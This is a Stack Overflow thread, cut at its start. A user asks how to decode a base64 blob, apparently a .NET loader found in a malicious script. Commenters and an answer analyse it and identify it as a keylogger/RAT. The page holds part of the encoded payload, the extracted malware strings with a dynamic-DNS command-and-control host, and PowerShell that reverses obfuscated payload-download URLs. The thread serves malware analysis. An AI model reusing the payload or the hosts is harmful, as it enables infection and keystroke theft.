XNSZWFkAGFwcGxpY2F0aW9uTmFtZQBjb21tYW5kTGluZQBwcm9jZXNzQXR0cmlidXRlcwB0aHJlYWRBdHRyaWJ1dGVzAGluaGVyaXRIYW5kbGVzAGNyZWF0aW9uRmxhZ3MAZW52aXJvbm1lbnQAY3VycmVudERpcmVjdG9yeQBzdGFydHVwSW5mbwBwcm9jZXNzSW5mb3JtYXRpb24AUHJvY2Vzc0hhbmRsZQBUaHJlYWRIYW5kbGUAUHJvY2Vzc0lkAFRocmVhZElkAFNpemUAUmVzZXJ2ZWQxAERlc2t0b3AAVGl0bGUATWlzYwBSZXNlcnZlZDIAU3RkSW5wdXQAU3RkT3V0cHV0AFN0ZEVycm9yAFJ1bgBzcwBiAEdldFByb2Nlc3NlcwBBcHBEb21haW4AZ2V0X0N1cnJlbnREb21haW4ATG9hZABHZXRNZXRob2QATWV0aG9kSW5mbwBNZXRob2RCYXNlAGdldF9Qcm9jZXNzTmFtZQBTdHJpbmdzAExDYXNlAENvbnRhaW5zAGdldF9FbnRyeVBvaW50AEdiaURCT1NrUjYxbzM2TDQ2OQBUaHJlYWQAU3lzdGVtLlRocmVhZGluZwBTbGVlcAB0c0FFOXNaaEppaHdVY1pXcGkAcmR5MDRlanlKWHhVNHAwYjBOAGl4Z0xzU2RyYlkzOXNURXMxUQBMQjE3WE5uMG9rWmJ4UE1OV04AZjhPUHhNMDBoNm5mZnBKSU84AHNzdC5SZXNvdXJjZXMucmVzb3VyY2VzAEdlbmVyYXRlZENvZGVBdHRyaWJ1dGUAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAFN5c3RlbS5Db21wb25lbnRNb2RlbABFZGl0b3JCcm93c2FibGVTdGF0ZQBEZWJ1Z2dlckhpZGRlbkF0dHJpYnV0ZQBTdGFuZGFyZE1vZHVsZUF0dHJpYnV0ZQBIaWRlTW9kdWxlTmFtZUF0dHJpYnV0ZQBIZWxwS2V5d29yZEF0dHJpYnV0ZQBTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduAERlYnVnZ2VyTm9uVXNlckNvZGVBdHRyaWJ1dGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUATXlHcm91cENvbGxlY3Rpb25BdHRya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'
decoded=decode(encoded1)

I try to decode the resulting string with the code:

decodedlist=decoded.split()
for string in decodedlist:
    stringdecoded=str(string,'ascii')
    print(stringdecoded)

but it gave me errors.

desertnaut
  • 57,590
  • 26
  • 140
  • 166
Henry A. Norza
  • 1
  • 1
  • 3
    I don't think anyone is willing to download malicious code just to figure out what it actually does to your machine... – Theo Nov 06 '20 at 13:36
  • 2
    Not a coding problem. Probably malicious code. – marsze Nov 06 '20 at 13:39
  • 3
    You might have better luck at [Security.SE](https://security.stackexchange.com/). The code, which I don't care to download, attempts to install a .Net assembly. That likely contains malware. – vonPryz Nov 06 '20 at 13:43
  • I appreciate your comments, I updated the question with the lines I already downloaded in a closed virtual environment. This lines are just strings to be reviewed but can't run – Henry A. Norza Nov 06 '20 at 13:46
  • Try to disassemble the string with IL Disassembler (ildasm). Or even better, decompile it with ILSpy. – Dialecticus Nov 06 '20 at 13:49
  • @HenryA.Norza Try writing `$Rumpe` and `$Server` to disk (ie. `Set-Content -Path .\malware-sample $Rumpe -Encoding Byte`), then upload the file to VirusTotal (assuming your local AV doesn't intercept it) – Mathias R. Jessen Nov 06 '20 at 13:49
  • Since it's a .Net assembly, the result is not going to be human-readable string but a binary. Save that one onto disk and try ildasm. – vonPryz Nov 06 '20 at 13:53
  • Here's a sample how to [write binary](https://stackoverflow.com/q/47580772/503046) files from Base64 string data in Python. – vonPryz Nov 06 '20 at 14:25
  • https://www.virusradar.com/en/MSIL_Bladabindi/detail – CraftyB Nov 06 '20 at 17:10

1 Answers1

1

It's at minimum, a keylogger.

the code you see are just reversed http links, that lead to reversed base64 encoded byte arrays.

here's some info I pulled from it

<Module> Clie.exe Program Lime Keylogger mscorlib System Object host port registryName splitter victimName version System.Threading Mutex stubMutex System.IO FileInfo currentAssemblyFileInfo keylogger isConnected System.Net.Sockets TcpClient tcpSock
et MemoryStream memoryStream bytesArray lastCapturedImage currentPlugin Main Start DeleteValueFromRegistry GetValueFromRegistry Microsoft.Win32 RegistryValueKind SaveValueOnRegistry GetInfo StringToBase64 Base64ToString StringToBytes BytesToString Decompress
Gzip SearchForCam GetForegroundWindowTitle GetHWID Plugin Uninstall HandleData CreateHash Send Connect Receive NtSetInformationProcess capGetDriverDescriptionA GetVolumeInformation GetForegroundWindow GetWindowText GetWindowTextLength .ctor System.Text Strin
gBuilder ToUnicodeEx GetKeyboardState MapVirtualKey GetWindowThreadProcessId GetKeyboardLayout GetAsyncKeyState AV VKCodeToUnicode System.Windows.Forms Keys Fix WRK LastAV LastAS lastKey Logs vn Microsoft.VisualBasic Microsoft.VisualBasic.Devices Keyboard ke
yboard System.Runtime.CompilerServices CompilationRelaxationsAttribute RuntimeCompatibilityAttribute Clie STAThreadAttribute Interaction Command Registry RegistryKey CurrentUser SetValue Thread Sleep Environment Exit ThreadStart Application DoEvents System.D
iagnostics Process GetCurrentProcess IntPtr op_Explicit set_MinWorkingSet Microsoft.VisualBasic.CompilerServices Operators CompareString String Concat name RegistryKeyPermissionCheck CreateSubKey DeleteValue IDisposable Dispose ret OpenSubKey RuntimeHelpers 
GetObjectValue GetValue n t typ ConditionalCompareObjectEqual Conversions ToString get_MachineName get_UserName FileSystemInfo DateTime get_LastWriteTime get_Date Computer ServerComputer ComputerInfo get_Info get_OSFullName OperatingSystem get_OSVersion get_
ServicePack Strings CompareMethod Split SpecialFolder GetFolderPath Contains GetValueNames get_Length s Convert ToBase64String FromBase64String S Encoding get_UTF8 GetBytes B GetString System.IO.Compression GZipStream Stream CompressionMode Byte set_Position
 Read BitConverter ToInt32 Space Zero op_Equality Environ Conversion Hex b c System.Reflection Assembly Load Module GetModules Type GetTypes get_FullName EndsWith get_Assembly CreateInstance DeleteSubKeyTree AppWinStyle Shell WaitHandle Close ConcatenateObje
ct get_Chars Write ToArray System.Net WebClient DownloadData Path GetTempFileName File WriteAllBytes get_Name Exception get_Message ProjectData ClearProjectError NewLateBinding LateSet LateCall Boolean LateGet CompareObjectEqual OrObject ToBoolean Screen get
_PrimaryScreen System.Drawing Rectangle get_Bounds get_Width get_Height Bitmap System.Drawing.Imaging PixelFormat Graphics Image FromImage Size CopyPixelOperation CopyFromScreen Cursors Cursor get_Default Point get_Position Draw SetProjectError ToInteger Dra
wImage ImageFormat get_Jpeg Save WriteByte RuntimeTypeHandle GetTypeFromHandle ChangeType System.Security.Cryptography MD5CryptoServiceProvider HashAlgorithm ComputeHash Monitor Enter Int32 Socket get_Client SocketFlags set_ReceiveBufferSize set_SendBufferSi
ze set_SendTimeout set_ReceiveTimeout Empty DirectoryInfo get_Directory <Receive>b__0 ParameterizedThreadStart <>9__CachedAnonymousMethodDelegate1 CompilerGeneratedAttribute a0 get_Available SelectMode Poll Join NetworkStream GetStream ReadByte ChrW Char ToL
ong System.Runtime.InteropServices DllImportAttribute ntdll hProcess processInformationClass processInformation processInformationLength avicap32.dll wDriver lpszName MarshalAsAttribute UnmanagedType cbName lpszVer cbVer kernel32 GetVolumeInformationA lpRoot
PathName lpVolumeNameBuffer nVolumeNameSize lpVolumeSerialNumber lpMaximumComponentLength lpFileSystemFlags lpFileSystemNameBuffer nFileSystemNameSize user32.dll GetWindowTextA hWnd WinTitle MaxLength GetWindowTextLengthA hwnd .cctor get_ExecutablePath a d O
utAttribute e f g user32 GetProcessById get_MainWindowTitle DateAndTime get_Now get_ProcessName k get_ShiftKeyDown get_CapsLock ToUpper ToLower get_CtrlKeyDown Remove     d i  !   a c t  S o f t w a r e \  l l  v n  _  N / A  y y - M M - d d S P 
    0  x 8 6      x 6 4       x 8 6  Y e s  N o  . .  ,  S y s t e m D r i v e  \  E R R  .  S o f t w a r e  Cc m d . e x e   / C   Y   / N   / D   Y   / T   1   &   D e l   "  "  k l    p r o f  ~  g e t v a l u e  @  r n  M S G  E x e c u 
t e   E R R O R  b l a  D o w n l o a d   E R R O R  E x e c u t e d   A s    E x e c u t e   E R R O R    i n v  p l  A  h  p  o s k  s t a r t  O f f  o f f  r e t  G T  C A P  u n  u p  U p d a t e   E R R O R    . e x e  U p d a t i n 
g   T o    U p d a t e   E R R O R    E x  P L G  i n d  H  P  c  E R  x 2     
  :  i n f  c l e a r  /j h o l e p p p p p 5 . d u c k d n s . o r g   9 5 9 5  d 7 4 f 6 8 0 0 1 6  @ ! # & ^ % $  T l l B T i B D Q V Q =  0 . 7 N C     [ k l ]   
  y y / M M / d d      
 [  ]  [ E N T E R ]  
  [ T A P ]

how I got the above

$dll = '0/L00dc/r/ee.etsap//:sptth'
#this lead to a paste.ee page, which I manually copied to $RumpeD
$dll[-1..-$dll.Length] -join ''

$RumpeD="copy pasta of string"

#same as above
$Fi = 'txt.34612474295/sbv/erots.sbvle//:ptth';
$Fi[-1..-$Fi.Length] -join ''

$FiRe ="copy pasta of string"

[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $FiRe[-1..-$FiRe.Length] -join '' ))
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( $RumpeD[-1..-$RumpeD.Length] -join '' ))

interesting bit near the end j h o l e p p p p p 5 . d u c k d n s . o r g

PowerShellGuy
  • 733
  • 2
  • 8